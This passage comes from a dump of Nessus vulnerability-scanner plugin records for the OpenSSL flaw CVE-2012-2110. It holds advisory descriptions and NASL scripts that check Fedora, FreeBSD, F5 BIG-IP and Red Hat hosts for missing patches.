value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-2110\");\n script_xref(name:\"FEDORA\", value:\"2012-6343\");\n\n script_name(english:\"Fedora 17 : openssl-1.0.0i-1.fc17 (2012-6343)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Upstream security update fixing CVE-2012-2110 - memory corruption in\nwhen reading ASN.1 structures through BIO interface.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=814185\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-April/079149.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8cb551b8\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openssl package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:17\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/04/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^17([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 17.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC17\", reference:\"openssl-1.0.0i-1.fc17\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssl\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T15:39:32", "description": "OpenSSL security team reports :\n\nA potentially exploitable vulnerability has been discovered in the OpenSSL function asn1_d2i_read_bio. Any application which uses BIO or FILE based functions to read untrusted DER format data is vulnerable.\nAffected functions are of the form d2i_*_bio or d2i_*_fp, for example d2i_X509_bio or d2i_PKCS12_fp.", "cvss3": {}, "published": "2012-04-23T00:00:00", "type": "nessus", "title": "FreeBSD : OpenSSL -- integer conversions result in memory corruption (7184f92e-8bb8-11e1-8d7b-003067b2972c)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2110"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:openssl", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_7184F92E8BB811E18D7B003067B2972C.NASL", "href": "https://www.tenable.com/plugins/nessus/58829", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(58829);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2012-2110\");\n script_bugtraq_id(53158);\n\n script_name(english:\"FreeBSD : OpenSSL -- integer conversions result in memory corruption (7184f92e-8bb8-11e1-8d7b-003067b2972c)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"OpenSSL security team reports :\n\nA potentially exploitable vulnerability has been discovered in the\nOpenSSL function asn1_d2i_read_bio. Any application which uses BIO or\nFILE based functions to read untrusted DER format data is vulnerable.\nAffected functions are of the form d2i_*_bio or d2i_*_fp, for example\nd2i_X509_bio or d2i_PKCS12_fp.\"\n );\n # http://marc.info/?l=full-disclosure&m=133483221408243\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://marc.info/?l=full-disclosure&m=133483221408243\"\n );\n # http://www.openssl.org/news/secadv/20120419.txt\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.openssl.org/news/secadv/20120419.txt\"\n );\n # https://vuxml.freebsd.org/freebsd/7184f92e-8bb8-11e1-8d7b-003067b2972c.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b35435e5\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/04/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"openssl<1.0.1_1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T15:28:58", "description": "The asn1_d2i_read_bio function in crypto/asn1/a_d2i_fp.c in OpenSSL before 0.9.8v, 1.0.0 before 1.0.0i, and 1.0.1 before 1.0.1a does not properly interpret integer data, which allows remote attackers to conduct buffer overflow attacks, and cause a denial of service (memory corruption) or possibly have unspecified other impact, via crafted DER data, as demonstrated by an X.509 certificate or an RSA public key.", "cvss3": {}, "published": "2015-04-10T00:00:00", "type": "nessus", "title": "F5 Networks BIG-IP : OpenSSL vulnerability (SOL16285)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2110"], "modified": "2019-01-04T00:00:00", "cpe": ["cpe:/a:f5:big-ip_access_policy_manager", "cpe:/a:f5:big-ip_application_security_manager", "cpe:/a:f5:big-ip_application_visibility_and_reporting", "cpe:/a:f5:big-ip_global_traffic_manager", "cpe:/a:f5:big-ip_link_controller", "cpe:/a:f5:big-ip_local_traffic_manager", "cpe:/a:f5:big-ip_wan_optimization_manager", "cpe:/a:f5:big-ip_webaccelerator", "cpe:/h:f5:big-ip", "cpe:/h:f5:big-ip_protocol_security_manager"], "id": "F5_BIGIP_SOL16285.NASL", "href": "https://www.tenable.com/plugins/nessus/82671", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution SOL16285.\n#\n# The text description of this plugin is (C) F5 Networks.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(82671);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/01/04 10:03:40\");\n\n script_cve_id(\"CVE-2012-2110\");\n script_bugtraq_id(53158);\n\n script_name(english:\"F5 Networks BIG-IP : OpenSSL vulnerability (SOL16285)\");\n script_summary(english:\"Checks the BIG-IP version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote device is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The asn1_d2i_read_bio function in crypto/asn1/a_d2i_fp.c in OpenSSL\nbefore 0.9.8v, 1.0.0 before 1.0.0i, and 1.0.1 before 1.0.1a does not\nproperly interpret integer data, which allows remote attackers to\nconduct buffer overflow attacks, and cause a denial of service (memory\ncorruption) or possibly have unspecified other impact, via crafted DER\ndata, as demonstrated by an X.509 certificate or an RSA public key.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://support.f5.com/csp/article/K16285\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5\nSolution SOL16285.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_visibility_and_reporting\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_wan_optimization_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_webaccelerator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip_protocol_security_manager\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/04/09\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/04/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude(\"f5_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/BIG-IP/version\");\nif ( ! version ) audit(AUDIT_OS_NOT, \"F5 Networks BIG-IP\");\nif ( isnull(get_kb_item(\"Host/BIG-IP/hotfix\")) ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/hotfix\");\nif ( ! get_kb_item(\"Host/BIG-IP/modules\") ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/modules\");\n\nsol = \"SOL16285\";\nvmatrix = make_array();\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# APM\nvmatrix[\"APM\"] = make_array();\nvmatrix[\"APM\"][\"affected\" ] = make_list(\"11.0.0-11.1.0\",\"10.1.0-10.2.4\");\nvmatrix[\"APM\"][\"unaffected\"] = make_list(\"11.2.0-11.6.0\");\n\n# ASM\nvmatrix[\"ASM\"] = make_array();\nvmatrix[\"ASM\"][\"affected\" ] = make_list(\"11.0.0-11.1.0\",\"10.0.0-10.2.4\");\nvmatrix[\"ASM\"][\"unaffected\"] = make_list(\"11.2.0-11.6.0\");\n\n# AVR\nvmatrix[\"AVR\"] = make_array();\nvmatrix[\"AVR\"][\"affected\" ] = make_list(\"11.0.0-11.1.0\");\nvmatrix[\"AVR\"][\"unaffected\"] = make_list(\"11.2.0-11.6.0\");\n\n# GTM\nvmatrix[\"GTM\"] = make_array();\nvmatrix[\"GTM\"][\"affected\" ] = make_list(\"11.0.0-11.1.0\",\"10.0.0-10.2.4\");\nvmatrix[\"GTM\"][\"unaffected\"] = make_list(\"11.2.0-11.6.0\");\n\n# LC\nvmatrix[\"LC\"] = make_array();\nvmatrix[\"LC\"][\"affected\" ] = make_list(\"11.0.0-11.1.0\",\"10.0.0-10.2.4\");\nvmatrix[\"LC\"][\"unaffected\"] = make_list(\"11.2.0-11.6.0\");\n\n# LTM\nvmatrix[\"LTM\"] = make_array();\nvmatrix[\"LTM\"][\"affected\" ] = make_list(\"11.0.0-11.1.0\",\"10.0.0-10.2.4\");\nvmatrix[\"LTM\"][\"unaffected\"] = make_list(\"11.2.0-11.6.0\");\n\n# PSM\nvmatrix[\"PSM\"] = make_array();\nvmatrix[\"PSM\"][\"affected\" ] = make_list(\"11.0.0-11.1.0\",\"10.0.0-10.2.4\");\nvmatrix[\"PSM\"][\"unaffected\"] = make_list(\"11.2.0-11.4.1\");\n\n# WAM\nvmatrix[\"WAM\"] = make_array();\nvmatrix[\"WAM\"][\"affected\" ] = make_list(\"11.0.0-11.1.0\",\"10.0.0-10.2.4\");\nvmatrix[\"WAM\"][\"unaffected\"] = make_list(\"11.2.0-11.3.0\");\n\n# WOM\nvmatrix[\"WOM\"] = make_array();\nvmatrix[\"WOM\"][\"affected\" ] = make_list(\"11.0.0-11.1.0\",\"10.0.0-10.2.4\");\nvmatrix[\"WOM\"][\"unaffected\"] = make_list(\"11.2.0-11.3.0\");\n\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n if (report_verbosity > 0) security_hole(port:0, extra:bigip_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = bigip_get_tested_modules();\n audit_extra = \"For BIG-IP module(s) \" + tested + \",\";\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, \"running any of the affected modules\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T15:40:23", "description": "Upstream security update fixing CVE-2012-2110 - memory corruption in when reading ASN.1 structures through BIO interface.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2012-04-30T00:00:00", "type": "nessus", "title": "Fedora 16 : openssl-1.0.0i-1.fc16 (2012-6403)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2110"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:openssl", "cpe:/o:fedoraproject:fedora:16"], "id": "FEDORA_2012-6403.NASL", "href": "https://www.tenable.com/plugins/nessus/58916", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-6403.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(58916);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-2110\");\n script_bugtraq_id(53158);\n script_xref(name:\"FEDORA\", value:\"2012-6403\");\n\n script_name(english:\"Fedora 16 : openssl-1.0.0i-1.fc16 (2012-6403)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Upstream security update fixing CVE-2012-2110 - memory corruption in\nwhen reading ASN.1 structures through BIO interface.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=814185\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-April/079299.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f506245c\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openssl package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:16\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/04/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^16([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 16.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC16\", reference:\"openssl-1.0.0i-1.fc16\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssl\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T16:21:21", "description": "Updated openssl packages that fix one security issue are now available for Red Hat Enterprise Linux 3 and 4 Extended Life Cycle Support; Red Hat Enterprise Linux 5.3 Long Life; and Red Hat Enterprise Linux 5.6, 6.0 and 6.1 Extended Update Support.\n\nThe Red Hat Security Response Team has rated this update as having important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols, as well as a full-strength, general purpose cryptography library.\n\nMultiple numeric conversion errors, leading to a buffer overflow, were found in the way OpenSSL parsed ASN.1 (Abstract Syntax Notation One) data from BIO (OpenSSL's I/O abstraction) inputs. Specially crafted DER (Distinguished Encoding Rules) encoded data read from a file or other BIO input could cause an application using the OpenSSL library to crash or, potentially, execute arbitrary code. (CVE-2012-2110)\n\nAll OpenSSL users should upgrade to these updated packages, which contain a backported patch to resolve this issue. For the update to take effect, all services linked to the OpenSSL library must be restarted, or the system rebooted.", "cvss3": {}, "published": "2013-01-24T00:00:00", "type": "nessus", "title": "RHEL 4 / 5 / 6 : openssl (RHSA-2012:0522)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2110"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:openssl", "p-cpe:/a:redhat:enterprise_linux:openssl-debuginfo", "p-cpe:/a:redhat:enterprise_linux:openssl-devel", "p-cpe:/a:redhat:enterprise_linux:openssl-perl", "p-cpe:/a:redhat:enterprise_linux:openssl-static", "cpe:/o:redhat:enterprise_linux:3", "cpe:/o:redhat:enterprise_linux:4", "cpe:/o:redhat:enterprise_linux:5.3", "cpe:/o:redhat:enterprise_linux:5.6", "cpe:/o:redhat:enterprise_linux:6.1"], "id": "REDHAT-RHSA-2012-0522.NASL", "href": "https://www.tenable.com/plugins/nessus/64033", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:0522. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(64033);\n script_version(\"1.31\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2012-2110\");\n script_bugtraq_id(53158);\n script_xref(name:\"RHSA\", value:\"2012:0522\");\n\n script_name(english:\"RHEL 4 / 5 / 6 : openssl (RHSA-2012:0522)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated openssl packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 3 and 4 Extended Life Cycle Support; Red\nHat Enterprise Linux 5.3 Long Life; and Red Hat Enterprise Linux 5.6,\n6.0 and 6.1 Extended Update Support.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. A Common Vulnerability Scoring System\n(CVSS) base score, which gives a detailed severity rating, is\navailable from the CVE link in the References section.\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL\nv2/v3) and Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library.\n\nMultiple numeric conversion errors, leading to a buffer overflow, were\nfound in the way OpenSSL parsed ASN.1 (Abstract Syntax Notation One)\ndata from BIO (OpenSSL's I/O abstraction) inputs. Specially crafted\nDER (Distinguished Encoding Rules) encoded data read from a file or\nother BIO input could cause an application using the OpenSSL library\nto crash or, potentially, execute arbitrary code. (CVE-2012-2110)\n\nAll OpenSSL users should upgrade to these updated packages, which\ncontain a backported patch to resolve this issue. For the update to\ntake effect, all services linked to the OpenSSL library must be\nrestarted, or the system rebooted.\"\n );\n # http://www.openssl.org/news/secadv/20120419.txt\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.openssl.org/news/secadv/20120419.txt\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2012:0522\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-2110\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssl-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssl-static\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease 